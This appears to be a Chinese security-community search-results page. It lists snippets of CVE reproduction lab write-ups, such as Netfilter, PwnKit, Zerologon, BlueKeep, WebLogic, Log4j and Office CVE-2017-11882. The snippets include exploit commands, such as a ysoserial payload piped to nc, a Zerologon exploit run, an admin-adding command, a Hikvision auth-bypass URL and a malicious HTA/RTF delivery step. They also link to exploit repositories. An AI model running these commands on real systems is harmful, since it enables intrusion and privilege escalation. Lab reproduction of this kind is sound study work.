首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏今天有没有多懂一点工业安全

    CVE漏洞复现CVE-2023-32233

    [漏洞名称]:CVE-2023-32233 NetFilter权限提升 [漏洞描述]:由研究人员 Patryk Sondej (波兰)和 Piotr Krysiuk(爱尔兰)发现,Linux 内核的 poc二进制文件: 输入:gcc -Wall -o exploit exploit.c -lmnl -lnftnl 如果觉得以上太困难 个人推荐去大佬的环境下载地址,里面有做好的镜像,可以直接进行下面复现过程 pwd=8888 [复现过程]: 输入命令:cd ~ ls 查看根目录: 执行编译好的exp文件: . /exp 成功得到root权限: [参考资料]: Liuk3r/CVE-2023-32233:CVE-2023-32233:Linux内核中的安全漏洞CVE-2023-32233 (github.com ) CVE漏洞复现-CVE-2023-32233 NetFilter权限提升-CSDN博客 CVE-2023-32233 (LINUX内核权限提升漏洞)_cve-2023 提权-CSDN博客

    1K10编辑于 2024-07-17
  • 来自专栏字节脉搏实验室

    CVE-2019-1388+CVE-2019-0803复现

    作者-ohh 本次测试环境为w7 1.cve-2019-1388利用工具:https://github.com/jas502n/CVE-2019-1388 cve-2019-1388提权影响范围如下: 2.cve-2019-0803利用工具: https://github.com/k8gege/K8tools/blob/master/CVE-2019-0803.exe 漏洞影响范围: ? cve-2019-0803 cmd “net user admin999 admin /add” ?

    1.2K20发布于 2020-04-20
  • 来自专栏ChaMd5安全团队

    CVE-2018-1111复现

    近日,红帽官方发布了安全更新,修复了编号为CVE-2018-1111的远程代码执行漏洞,攻击者可以通过伪造DHCP服务器发送响应包,攻击红帽系统,获取root权限并执行任意命令。 复现 环境 kali x64 centos 7 vmware14 设置网络 断开kali和centos的网络 将kali和centos都设置成主机模式,并且关闭主机的dhcp功能 ?

    1.1K20发布于 2018-07-25
  • 来自专栏c2k2o6

    cve-2021-4034复现

    cve-2021-4034复现 影响范围 exp 打码 复现 参考 cve-2021-4034复现 Linux Polkit 本地提权漏洞 cvss评分 7.8 高危 polkit的pkexec 存在本地权限提升漏洞 ))(*argv, None) cenv = (c_char_p * (len(envp) + 1))(*envp, None) libc.execve(cmd, cargv, cenv) # 执行 复现

    2K10编辑于 2022-01-27
  • 来自专栏Ms08067安全实验室

    漏洞复现 | CVE‐2017‐5645

    本文作者:Taoing(Ms08067实验室 SRSP TEAM 核心成员) Apache Log4j Server 反序列化命令执行漏洞(CVE‐2017‐5645) 一、漏洞原理 Apache 二、环境搭建 cd /vulhub/log4j/CVE‐2017‐5645 #进入环境目录 docker‐compose build && docker‐compose up ‐d 三、漏洞复现 payload 使用ysoserial生成payload,然后直接发送给your‐ip:4712端口即可。 java ‐jar ysoserial.jar CommonsCollections5 "touch /tmp/CVE‐2017‐5645_is_succe ss" | nc your‐ip 4712 执行docker‐compose exec log4j bash进容器 可见 /tmp/CVE‐2017‐5645_is_success已成功创建: ?

    2.9K10发布于 2020-09-22
  • 来自专栏黑伞安全

    CVE-2020-1472复现指北

    -2020-1472 cd CVE-2020-1472\ pip install -r requirements.txt python zerologon_tester.py DC_NETBIOS_NAME 整个利用过程大概是下列流程 置空域控保存在AD中的密码 获取域控用户HASH 通过获取到的管理员HASH得到一个SHELL,然后连接上去导出原来计算机中本地保存的HASH 通过获取到的HASH恢复置空的域控密码 利用复现 下载EXP # ~/impacket/ cd examples git clone https://github.com/dirkjanm/CVE-2020-1472 cd CVE-2020-1472 \ 置空密码 # ~impacket/examples/CVE-2020-1472 python cve-2020-1472-exploit.py DC_NETBIOS_NAME DC_IP_ADDR 修复建议 安装符合操作系统的漏洞补丁,详情请见:https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2020-1472

    2.3K148发布于 2020-09-18
  • 来自专栏信安之路

    CVE2018-1111 漏洞复现

    本文作者:\xeb\xfe(来自信安之路作者团队) 近日,红帽官方发布了安全更新,修复了编号为 CVE-2018-1111 的远程代码执行漏洞,攻击者可以通过伪造 DHCP 服务器发送响应包,攻击红帽系统 漏洞复现过程 环境准备 这里我用的测试机器系统分别是Centos 7 和 Kali 2018.2。 Centos 7 作为被攻击机,需要设置自动获取 ip 地址。 CVE2018-1111 漏洞复现到此结束~! 通过本文,大家可以学习到如何用 dnsmasq 来快速搭建一个 DNS 服务或者 DHCP 服务,并对 DHCP 服务的 option 部分值和含义有相关了解,以及学习了 CVE2018-1111 漏洞的复现及环境搭建 参考链接 DynoRoot:Red Hat DHCP 客户端命令执行漏洞 CVE-2018-1111 预警 https://www.anquanke.com/post/id/145201

    1.4K00发布于 2018-08-08
  • 来自专栏安全漏洞环境学习

    CVE-2017-8464漏洞复现

    CVE-2017-8464是Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。

    99240发布于 2019-09-24
  • 来自专栏渗透云笔记

    CVE 2019 0708 复现过程笔记

    3420557312|B58548681854236C7939003B583A8078|/ 可以自行下载学习 在github上找到了k8师傅写的批量检测工具; https://github.com/k8gege/CVE

    70310发布于 2020-02-17
  • 来自专栏BM CTF

    CVE-2022-32991靶场复现

    CVE官方给出的提示: welcome.php页面存在SQL注入,并且这个参数是eid 打开靶场环境: 页面是一个登陆注册的界面 用户注册: 1 01@0.com 123456

    61830编辑于 2023-10-28
  • 来自专栏字节脉搏实验室

    CVE-2017-7921漏洞复现

    作者-Beginner 0x01 CVE-2017-7921漏洞复现 许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。 ? 0x02 漏洞复现: 利用Goby发现漏洞(CVE-2017-7921): ? 利用路径:/Security/users?auth=YWRtaW46MTEK 附:检索所有用户及其角色的列表 ?

    7.7K21发布于 2020-10-27
  • 来自专栏Script Boy (CN-SIMO)

    CVE-2020-2551复现过程

    项目地址 cnsimo/CVE-2020-2551 CVE-2020-2551 weblogic iiop 反序列化漏洞 该项目的搭建脚本在10.3.6版本经过测试,12版本未测试。 使用方法 先git clone https://github.com/cnsimo/CVE-2020-2551.git克隆本项目到本地。 建议所有操作都在一台机器上复现,避免网络问题导致的复现失败! ---- 项目引用 WeblogicEnvironment CVE-2020-2551 漏洞分析参考 WebLogic WLS核心组件RCE分析(CVE-2020-2551) - 安全客,安全资讯平台 Weblogic CVE-2020-2551 IIOP协议反序列化RCE – Y4er的博客 漫谈 WebLogic-CVE-2020-2551

    1.9K20发布于 2020-04-08
  • 来自专栏农夫安全

    CVE-2017-11882漏洞复现

    2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882)。 Microsoft Office 2016 0x01 环境清单 WindowsServer 2008 (192.168.3.114) Office 2007 MAC OSX(192.168.3.106) 0X02 复现过程 将生成的hta文档放入WebServer根目录:http://192.168.3.106/evil.hta python webdav_exec_CVE-2017-11882.py -u http:// 我(Cobalt Strike)本地监听了一个8081端口,用来接收客户端的Shell 要生成一个rtf/doc文档,github上已有生成脚本 webdav_exec_CVE-2017-11882.py -> http://payloads.online/tools/cve-2017-11882/webdav_exec_CVE-2017-11882.py 生成rtf文档: 最后将test.rtf在目标机器上执行

    1.3K80发布于 2018-03-30
  • 来自专栏安全漏洞环境学习

    CVE-2019-0708漏洞复现

    前不久关于RDP的0708漏洞网上一片哀嚎,今天测试复现了一下,发现攻击之后,都会使得系统蓝屏。 CVE-2019-0708漏洞是通过检查用户的身份认证,导致可以绕过认证,不用任何的交互,直接通过rdp协议进行连接发送恶意代码执行命令到服务器中去。 2003 0X2 漏洞检测 各个厂家都已经发布了检测工具,在这里,我们使用开源的检测脚本,在msf上加载即可使用,下载链接: https://github.com/zerosum0x0/CVE

    1.6K20发布于 2019-09-24
  • 来自专栏betasec

    CVE-2019-0708 本地复现

    本文作者:Leafer(贝塔安全实验室-核心成员) 0708千呼万唤始出来,又将是一片腥风血雨 0x01:CVE-2019-0708的危害性 Windows系列服务器于2019年5月15号,被爆出高危漏洞 0x02:复现环境 首先搭建环境,我这里使用的是win7旗舰版(家庭版升级而来),KALI自带的v5.0.45版本MSF。 /rdp/cve_2019_0708_bluekeep_rce.rb 3.使用攻击命令 使用msfconsole命令进入metasploit-framework框架 ? \ target 使用set RHOSTS 设置靶机IP 使用set RPORT 设置靶机PORT 使用set target ID数字(可选为1-4)每种都代表了机器架构 在我的复现环境中使用 -2019-0708远程桌面代码执行漏洞复现: https://qiita.com/shimizukawasaki/items/024b296a4c9ae7c33961?

    2.5K20发布于 2020-07-31
  • 来自专栏一名白帽的成长史

    【漏洞复现】Weblogic漏洞搭建与复现CVE-2017-10271

    今天一起来看看CVE-2017-10271的复现吧~ ? ? Part.1 漏洞说明 漏洞说明 1、漏洞描述 WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发现此漏洞的利用方式为传播挖矿程序 部署CVE-2017-10271: ? 查看虚拟机状态: ? 可以看到端口映射到了7001,尝试访问: ? 成功,搭建完毕~ ? Part.3 漏洞复现 漏洞检测 可以直接使用工具进行漏洞检测: ?

    6.9K10发布于 2020-02-25
  • 来自专栏内网安全学习笔记

    CVE-2021-42287CVE-2021-42278分析复现

    距离漏洞披露已经过了许久,现在终于有些空余时间用于学习复现这两个漏洞。 概括 CVE-2021-42278,机器账户的名称一般用$结尾,但AD并未对域内机器账户名进行验证。 CVE-2021-42287, 结合上述42278漏洞,创建一个与DC机器账户名称相同的机器账户(不以$结尾),使用该账户请求一个TGT后,修改账户名,然后通过S4U2Self申请TGS Ticket, 利用原理:如果域内存在一台域控名为DC(机器账户为DC)的域控机,此时攻击者可利用CVE-2021-42287漏洞去申请一个机器账户,再将机器账户的sAMAccountName修改为DC。 复现过程: 手动实现 1.创建机器账户 拿到域成员权限后,利用Powermad.ps1创建机器用户 Import-Module Poweremad.ps1 New-MachineAccount -MachineAccount

    1.7K20编辑于 2023-04-17
  • 来自专栏安全漏洞环境学习

    Tomcat Put(CVE-2017-12615)复现

    根据描述,在 Windows 服务器下,将 readonly 参数设置为 false 时,即可通过 PUT 方式创建一个 JSP 文件,并可以执行任意代码。

    84530发布于 2019-09-24
  • 来自专栏安全漏洞环境学习

    Flash CVE-2018-15982 漏洞复现

    攻击者精心准备了一份俄文内容的员工问卷文档,该文档使用了最新的Flash 0day漏洞CVE-2018-15982和带有自毁功能的专属木马程序进行攻击,种种技术细节表明该APT组织不惜代价要攻下目标,但同时又十分小心谨慎 set LHOST 192.168.0.104 set RC4PASSWORD zale 接下来,我们生成攻击的程序和网页,生成脚本EXP下载地址: https://github.com/Ridter/CVE

    1.1K10发布于 2019-09-24
  • 来自专栏安全漏洞环境学习

    Flash CVE-2018-4878漏洞复现

    日发布了一条安全公告: https://helpx.adobe.com/security/products/flash-player/apsa18-01.html 公告称一个新的Flash 0Day漏洞(CVE 0x02 漏洞影响 Flash Player当前最新版本28.0.0.137以及之前的所有版本 0x03 漏洞复现 环境测试: 攻击机:kali 目标靶机:win7x64 +IE8.0+FLASH player28.0.0.137 下载漏洞利用脚本: wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar 可以看到漏洞利用的脚本和 链接是:https://github.com/anbai-inc/CVE-2018-4878 ? 将exp脚本放入kali下和index.html同一个目录下,生成恶意的swf文件,注意脚本下生成swf的目录是/opt/CVE-2018-4878,可以自定义修改目录 ?

    1.1K20发布于 2019-09-24
领券